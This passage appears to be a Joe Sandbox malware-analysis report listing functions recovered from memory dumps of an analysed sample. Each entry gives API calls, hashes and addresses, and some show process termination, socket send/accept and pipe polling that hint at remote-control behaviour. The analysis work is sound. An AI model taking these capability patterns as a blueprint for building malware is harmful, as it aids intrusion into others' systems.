Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 32bd4b264f86a9d4e3ec183064f2aceed8d207c991668c7c2cba68632bd42a36
Instruction ID: 60d337f4683e7e84d552db7eddb949b7de5eba2477c248635cc32dcc84bcb8e6
Opcode Fuzzy Hash: 32bd4b264f86a9d4e3ec183064f2aceed8d207c991668c7c2cba68632bd42a36
Instruction Fuzzy Hash: 2D01D6B1901205BBDBE16B768C89DFB3B9DEF452A4F008421FF1CA6101D675D841DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0636A2E3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0636A345
_memset.LIBCMT ref: 0636A359
_memset.LIBCMT ref: 0636A36A
_memset.LIBCMT ref: 0636A373

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: b9c8251fb0aba12eca4da9ea4f53e42c9333e308029381a33883d857467e21df
Instruction ID: b9f7bd5a146a2e1efe4bf0b1bb80904bec5996e60ef79dccdb3fe4378d47f5d8
Opcode Fuzzy Hash: b9c8251fb0aba12eca4da9ea4f53e42c9333e308029381a33883d857467e21df
Instruction Fuzzy Hash: 4901A172900318BEDBE26E668CC4DAB3B9DEF066A0F149026F619AA101D679C441D6F1

Uniqueness

Uniqueness Score: -1.00%

Function 06379A12 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 06379A2F
__lock.LIBCMT ref: 06379A8A
__lock.LIBCMT ref: 06379AAB
___addlocaleref.LIBCMT ref: 06379AC9

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
String ID:
API String ID: 1628550938-0
Opcode ID: 0e4aec7d6b7209eb2d750185771418bc14d860442357e3507647edf2cd9d6838
Instruction ID: 7eb6a1a2756ddce12968762730899b44a916a10826f93162707d84fbe2c20e1b
Opcode Fuzzy Hash: 0e4aec7d6b7209eb2d750185771418bc14d860442357e3507647edf2cd9d6838
Instruction Fuzzy Hash: FD116075802B01DFE7F0DF799C44B5ABBE0EF05310F50451AE4AA97290DB78AA41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0676C111 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_clock.LIBCMT ref: 0676C12D
_clock.LIBCMT ref: 0676C13B
_clock.LIBCMT ref: 0676C145
_clock.LIBCMT ref: 0676C153

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _clock
String ID:
API String ID: 876827150-0
Opcode ID: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction ID: e31e63e48e65e036a1d5dd3841aab0ba1597ddf00ef2974a7c166332081299eb
Opcode Fuzzy Hash: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction Fuzzy Hash: 180140B1D40619EFDB96EFE9D8C45ADBBB4EF00250F1080AAED91A7200D6304A45CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0636B54E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_clock.LIBCMT ref: 0636B56A
_clock.LIBCMT ref: 0636B578
_clock.LIBCMT ref: 0636B582
_clock.LIBCMT ref: 0636B590

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _clock
String ID:
API String ID: 876827150-0
Opcode ID: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction ID: 2c55eb5a9a54fd757a1565088e69ff56a1d2fc2f34e44213b91d40eded99fc57
Opcode Fuzzy Hash: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction Fuzzy Hash: CE012931E01319EFCB90EFEAC4805EDFBB4EB51350F5485AAE652EA114E6308A54CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0676B118 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0676B12D

Part of subcall function 06776EBD: __getptd.LIBCMT ref: 06776EDB

Part of subcall function 067757F0: __lock.LIBCMT ref: 0677580E
Part of subcall function 067757F0: ___sbh_find_block.LIBCMT ref: 06775819
Part of subcall function 067757F0: ___sbh_free_block.LIBCMT ref: 06775828
Part of subcall function 067757F0: HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
Part of subcall function 067757F0: GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

_malloc.LIBCMT ref: 0676B156
_strncpy.LIBCMT ref: 0676B176
_strtok.LIBCMT ref: 0676B182

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__getptd__lock_malloc_strncpy
String ID:
API String ID: 1160209254-0
Opcode ID: 3c1b0ffc3cf49d6dedd34540b6808c1e42b612aa27f3044f3cd94d23892195cc
Instruction ID: 93693f8109a7088124cabb3f351e43b1026a5f2e689acb0e8a98e524e534909d
Opcode Fuzzy Hash: 3c1b0ffc3cf49d6dedd34540b6808c1e42b612aa27f3044f3cd94d23892195cc
Instruction Fuzzy Hash: AE014436404285BADF886F29EC4DEB23FAADB43354B14402DFE48C7121EE72D05AC6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0636A555 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0636A56A

Part of subcall function 063762FA: __getptd.LIBCMT ref: 06376318

Part of subcall function 06374C2D: __lock.LIBCMT ref: 06374C4B
Part of subcall function 06374C2D: ___sbh_find_block.LIBCMT ref: 06374C56
Part of subcall function 06374C2D: ___sbh_free_block.LIBCMT ref: 06374C65

_malloc.LIBCMT ref: 0636A593
_strncpy.LIBCMT ref: 0636A5B3
_strtok.LIBCMT ref: 0636A5BF

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _strtok$___sbh_find_block___sbh_free_block__getptd__lock_malloc_strncpy
String ID:
API String ID: 4231573641-0
Opcode ID: 0c7d2ad69279c739a0d569e9c8e7f1d35e59de704b8391257e7275e1388a53e1
Instruction ID: 0e41d193fa2e01cb3049c7cca08b1f8a701b7fdd7ce22293adc141e9f8c75da9
Opcode Fuzzy Hash: 0c7d2ad69279c739a0d569e9c8e7f1d35e59de704b8391257e7275e1388a53e1
Instruction Fuzzy Hash: 84019E32800101AEDBD9AF24DC88DB23F6DDB03254B04401CFA899B522CD6AD58DC2D0

Uniqueness

Uniqueness Score: -1.00%

Function 06768EF1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000001,00000000,00000000), ref: 06768F28
TerminateProcess.KERNEL32(00000000,00000000), ref: 06768F37
GetLastError.KERNEL32 ref: 06768F41
CloseHandle.KERNEL32(00000000), ref: 06768F54

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate
String ID:
API String ID: 4043475357-0
Opcode ID: 8d3822ea06884b2a06da591808861f6db3ba9cfbafd397ac84e8397b97629090
Instruction ID: 14e30f171077b5246c89d87f93238290ca672c9a1812ddfa5f52c1db796d2cfc
Opcode Fuzzy Hash: 8d3822ea06884b2a06da591808861f6db3ba9cfbafd397ac84e8397b97629090
Instruction Fuzzy Hash: BEF0D1319402197FEB902AA59C09FEF7B69EB44710F540414FA14E5080DA709A0489A3

Uniqueness

Uniqueness Score: -1.00%

Function 067617AF Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 067617BA

Part of subcall function 06775C9D: __vscwprintf_helper.LIBCMT ref: 06775CAF

_malloc.LIBCMT ref: 067617CD

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

_vswprintf_s.LIBCMT ref: 067617E1

Part of subcall function 06775C29: __vsprintf_s_l.LIBCMT ref: 06775C3C

_memset.LIBCMT ref: 067617F4

Part of subcall function 067757F0: __lock.LIBCMT ref: 0677580E
Part of subcall function 067757F0: ___sbh_find_block.LIBCMT ref: 06775819
Part of subcall function 067757F0: ___sbh_free_block.LIBCMT ref: 06775828
Part of subcall function 067757F0: HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
Part of subcall function 067757F0: GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 3037472818-0
Opcode ID: 368d963abb0eb517ebbe479a3785072ae1ec1ee915dfb4ce7c08f27954518ff2
Instruction ID: 00ea3cae893f19e8b6dded9fff90bbc57c3541fe1efc626b19821bb8a4ab18f8
Opcode Fuzzy Hash: 368d963abb0eb517ebbe479a3785072ae1ec1ee915dfb4ce7c08f27954518ff2
Instruction Fuzzy Hash: 4EF0B4774002197AEBD1AB55DC88FFF375CDF865A5F104515FE2895040EA21A51052B4

Uniqueness

Uniqueness Score: -1.00%

Function 06360BEC Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 06360BF7

Part of subcall function 063750DA: __vscwprintf_helper.LIBCMT ref: 063750EC

_malloc.LIBCMT ref: 06360C0A

Part of subcall function 06374D0A: __FF_MSGBANNER.LIBCMT ref: 06374D2D
Part of subcall function 06374D0A: __NMSG_WRITE.LIBCMT ref: 06374D34

_vswprintf_s.LIBCMT ref: 06360C1E

Part of subcall function 06375066: __vsprintf_s_l.LIBCMT ref: 06375079

_memset.LIBCMT ref: 06360C31

Part of subcall function 06374C2D: __lock.LIBCMT ref: 06374C4B
Part of subcall function 06374C2D: ___sbh_find_block.LIBCMT ref: 06374C56
Part of subcall function 06374C2D: ___sbh_free_block.LIBCMT ref: 06374C65

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: ___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 104857598-0
Opcode ID: 7e23059bafbd4798591d7a3db8c69f66bc45552909d126080f5a0c3be064c3af
Instruction ID: e381d199f7ccefc0649de66443d2cb362e6406f5d00e257eef81304f3d2a1059
Opcode Fuzzy Hash: 7e23059bafbd4798591d7a3db8c69f66bc45552909d126080f5a0c3be064c3af
Instruction Fuzzy Hash: 1AF0BE7740021D7AD7B16E54AC80FBF3BACEF825A4F104529F929A6100DA2AE91192F0

Uniqueness

Uniqueness Score: -1.00%

Function 06360BEB Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 06360BF7

Part of subcall function 063750DA: __vscwprintf_helper.LIBCMT ref: 063750EC

_malloc.LIBCMT ref: 06360C0A

Part of subcall function 06374D0A: __FF_MSGBANNER.LIBCMT ref: 06374D2D
Part of subcall function 06374D0A: __NMSG_WRITE.LIBCMT ref: 06374D34

_vswprintf_s.LIBCMT ref: 06360C1E

Part of subcall function 06375066: __vsprintf_s_l.LIBCMT ref: 06375079

_memset.LIBCMT ref: 06360C31

Part of subcall function 06374C2D: __lock.LIBCMT ref: 06374C4B
Part of subcall function 06374C2D: ___sbh_find_block.LIBCMT ref: 06374C56
Part of subcall function 06374C2D: ___sbh_free_block.LIBCMT ref: 06374C65

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: ___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 104857598-0
Opcode ID: 1bb1d992bc75502e6dc67085cc0de012dfbb7ee066a9db04eaf9479d6a938439
Instruction ID: b58beee6bc5b80394d30aa4d0beb5a8439a464b5bd96e1ae470e661a3b103cf8
Opcode Fuzzy Hash: 1bb1d992bc75502e6dc67085cc0de012dfbb7ee066a9db04eaf9479d6a938439
Instruction Fuzzy Hash: 4DF0B4774002197ED7B16E64AC80FFF3BACEF811A4F104519F929A5100DB35991197F0

Uniqueness

Uniqueness Score: -1.00%

Function 0676BF53 Relevance: 6.0, APIs: 4, Instructions: 40networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,00000000,00000000), ref: 0676BF61
send.WS2_32(00000000,?,?,00000000), ref: 0676BF8E
send.WS2_32(00000000,?,?,00000000), ref: 0676BF9C
closesocket.WS2_32(00000000), ref: 0676BFA7

Part of subcall function 0676BEE3: closesocket.WS2_32(?), ref: 0676BEE5

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: closesocketsend$accept
String ID:
API String ID: 2168303407-0
Opcode ID: 02b140a7d914716000b31dbc29efd83fa103ef2c343ae07d29537006e1d21032
Instruction ID: 033815fa17e50d962bc5356d1e78dd36339fed229b0dee35f0ad42076a45c745
Opcode Fuzzy Hash: 02b140a7d914716000b31dbc29efd83fa103ef2c343ae07d29537006e1d21032
Instruction Fuzzy Hash: 69F02B36040704BFD7B03AB5EC45F86F3ADDF05A20F104A05FB22E14B0C6B1A8208F60

Uniqueness

Uniqueness Score: -1.00%

Function 06767E86 Relevance: 6.0, APIs: 4, Instructions: 39memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32(00000000,06767F29,00000000,00000000,06768ED8,?,06768ED8,?,?,06767F29,00000000,?), ref: 06767EA1
GetProcessHeap.KERNEL32(00000000,00000000,?,?,06767F29,00000000,?), ref: 06767EA7
HeapAlloc.KERNEL32(00000000,?,?,06767F29,00000000,?), ref: 06767EAE
InitializeProcThreadAttributeList.KERNEL32(00000000,06767F29,00000000,00000000,?,?,06767F29,00000000,?), ref: 06767EC3

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: fef0fa43dff633f3cc823e5500f242b9f3b8be96b7f87f4bef37426b669af9be
Instruction ID: ba62abb99236dac95fd883202fc4b104bb95286a10fbd65e17b4676251580e0e
Opcode Fuzzy Hash: fef0fa43dff633f3cc823e5500f242b9f3b8be96b7f87f4bef37426b669af9be
Instruction Fuzzy Hash: 6EF0587AA40118BFDB51DAE6DD88CAF7FBEDB89694720442ABA11D2100D6319E04DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 06766165 Relevance: 6.0, APIs: 4, Instructions: 35sleeppipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 06766177
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,067662A3,00000000), ref: 0676618B
Sleep.KERNEL32(000001F4,?,00000000,00000000,?,?,067662A3,00000000), ref: 0676619F
GetTickCount.KERNEL32 ref: 067661A5

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 8718801b43c685aea5f6b4b59d74d13de5989fc57db21b51ba6a61dbce0383fe
Instruction ID: 213511f790c3e7c23820b5cbe962b0fd8ce28aab81e1abb7b5dd9bf9acf2f5d0
Opcode Fuzzy Hash: 8718801b43c685aea5f6b4b59d74d13de5989fc57db21b51ba6a61dbce0383fe
Instruction Fuzzy Hash: C9F0A0B194010CBFFB009F95DC84CAFB7ADEA44695764843AFA01E2001EAB0DD408BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0677F04D Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0677F059

Part of subcall function 0677A735: __getptd_noexit.LIBCMT ref: 0677A738
Part of subcall function 0677A735: __amsg_exit.LIBCMT ref: 0677A745

__getptd.LIBCMT ref: 0677F070
__amsg_exit.LIBCMT ref: 0677F07E
__lock.LIBCMT ref: 0677F08E

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 462453bfacc3c8273cc1a5fad09cb66d85836b51e7c04fef32735188ee858179
Instruction ID: 2c6e9366c641945f200502a9d9ef7f71a3d5f4a81c23d1920e6b01a52c25034a
Opcode Fuzzy Hash: 462453bfacc3c8273cc1a5fad09cb66d85836b51e7c04fef32735188ee858179
Instruction Fuzzy Hash: 3DF03032920700DFEFE0BBB4D90DB5D76F0AF04720F518559D674A7381DB789641CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0637E48A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0637E496

Part of subcall function 06379B72: __getptd_noexit.LIBCMT ref: 06379B75
Part of subcall function 06379B72: __amsg_exit.LIBCMT ref: 06379B82

__getptd.LIBCMT ref: 0637E4AD
__amsg_exit.LIBCMT ref: 0637E4BB
__lock.LIBCMT ref: 0637E4CB

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: e1976236eb8f249a5f5dc53f8badee503464b70829c2872b799a0f0c229a3d3b
Instruction ID: e3b485b73550210bbeada0290bbdd4b6d3cedbb1e7c6b63e1d38931f9f1301cc
Opcode Fuzzy Hash: e1976236eb8f249a5f5dc53f8badee503464b70829c2872b799a0f0c229a3d3b
Instruction Fuzzy Hash: 1DF06D329007209EEBF1FF688C0075872A0EB00720F14468AD0659B2E1DB2CA901EAD2

Uniqueness

Uniqueness Score: -1.00%

Function 06768772 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 067687C4

Strings

%s%s, xrefs: 0676874E

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _malloc
String ID: %s%s
API String ID: 1579825452-3438391663
Opcode ID: a277a9d261a0ba5cf167d3a0057b9dd043b0524c41666ea6e1ab80c90fdff18d
Instruction ID: 065456ca08acbb7141415b1cee7b7f06268a3d8cc1cf47d867daeb043e9fd7ef
Opcode Fuzzy Hash: a277a9d261a0ba5cf167d3a0057b9dd043b0524c41666ea6e1ab80c90fdff18d
Instruction Fuzzy Hash: 86215932F04B405FCBF2CBE698816B7FBE0EB82250B44849DFDA65B502D561D40286B3

Uniqueness

Uniqueness Score: -1.00%

Function 0676AB43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 0676AB57
__snprintf.LIBCMT ref: 0676AB91

Strings

%c%c%c%c, xrefs: 0676AB86

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf
String ID: %c%c%c%c
API String ID: 2633826957-103593547
Opcode ID: a7da764e15742f26e5ebe684ca72f6acbaa7413018dd4a5d1d6a396260ae36f0
Instruction ID: 06341275cbd0c0e6cb522761ec913848b4339bf40eed036e13dd1e3091088900
Opcode Fuzzy Hash: a7da764e15742f26e5ebe684ca72f6acbaa7413018dd4a5d1d6a396260ae36f0
Instruction Fuzzy Hash: 8FF0967184464E6DDF41E7E48C9EEFFBFBD4B05205F040191AA50E7042EA65D34987A0

Uniqueness

Uniqueness Score: -1.00%

Function 067645F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 067645FC

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

__snprintf.LIBCMT ref: 06764610

Part of subcall function 06776E5A: RemoveDirectoryA.KERNEL32(06764674,?,06764674,00000000,?,?,?,?,00000000), ref: 06776E62
Part of subcall function 06776E5A: GetLastError.KERNEL32(?,06764674,00000000,?,?,?,?,00000000), ref: 06776E6C
Part of subcall function 06776E5A: __dosmaperr.LIBCMT ref: 06776E7B

Strings

%s\%s, xrefs: 06764609

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AllocateDirectoryErrorHeapLastRemove__dosmaperr__snprintf_malloc
String ID: %s\%s
API String ID: 47932920-4073750446
Opcode ID: 3efd203f101b790e6681c0b242396ab9e242ed13979c3716b155cedc8fe2e57a
Instruction ID: dba2e2972c6b32df7c2d1d155bbfa6403564557c9c34ac094559a3bf3b8addac
